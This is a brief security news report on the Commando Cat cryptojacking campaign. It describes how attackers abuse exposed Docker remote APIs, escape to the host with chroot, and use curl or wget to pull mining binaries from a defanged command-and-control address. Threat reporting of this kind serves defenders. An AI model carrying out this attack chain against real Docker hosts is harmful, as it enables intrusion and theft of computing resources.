A threat actor known as Commando Cat is linked to an ongoing cryptojacking campaign that exploits poorly secured Docker instances to deploy cryptocurrency miners for financial gain.
Trend Micro researchers Sunil Bharti and Shubham Singh stated in an analysis on Thursday: “Attackers use the cmd.cat/chattr Docker image container to retrieve payloads from their own command and control (C&C) infrastructure.”
Commando Cat is named for its use of the open-source Commando project to generate benign containers and was first documented by Cado Security earlier this year.
These attacks target misconfigured Docker remote API servers to deploy a Docker image named cmd.cat/chattr, then instantiate containers from it and use the chroot command to break out of their limitations, gaining access to the host operating system.
The final step involves using curl or wget commands to retrieve malicious mining program binaries from C&C servers (“leetdbs.anondns[.]net/z”) via shell scripts. The binary is suspected to be ZiggyStarTux, an open-source IRC bot based on Kaiten (also known as Tsunami) malware.
Researchers stated, “The significance of this campaign lies in its use of Docker images to deploy cryptojacking scripts on infected systems. This strategy allows attackers to exploit vulnerabilities in Docker configurations while evading detection by security software.”